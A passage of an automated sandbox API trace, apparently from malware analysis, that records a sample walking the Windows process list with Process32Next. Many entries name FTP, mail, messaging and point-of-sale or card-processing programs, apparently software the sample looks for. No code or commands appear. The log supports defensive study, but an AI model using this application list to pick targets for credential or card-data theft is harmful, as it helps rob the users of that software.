hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.411] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.414] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.416] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.419] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.422] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0192.424] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.427] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0192.434] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.437] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0192.439] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0192.442] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0192.444] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0192.446] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0192.449] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0192.451] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.454] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.456] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.459] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.461] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.465] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.467] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.483] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.486] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0192.489] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0192.491] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0192.494] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0192.497] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0192.499] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0192.501] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0192.504] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0192.506] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0192.509] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0192.511] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0192.514] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0192.516] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0192.566] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0192.570] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0192.573] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0192.575] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0192.578] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0192.580] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0192.582] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0192.585] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0192.588] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0192.590] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0192.593] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0192.596] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0192.599] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0192.639] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0192.642] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0192.645] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0192.653] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0192.656] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0192.659] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0192.662] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0192.665] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0192.669] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0192.671] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0192.674] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0192.676] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0192.678] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0192.685] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0192.687] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0192.690] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0192.693] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0192.695] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0192.698] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0192.700] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0192.703] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0192.706] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0192.708] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0192.711] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0192.713] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0192.715] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0192.718] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0192.752] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0192.755] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0192.758] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0192.760] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0192.763] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0192.765] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0192.768] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0192.771] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0192.773] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, 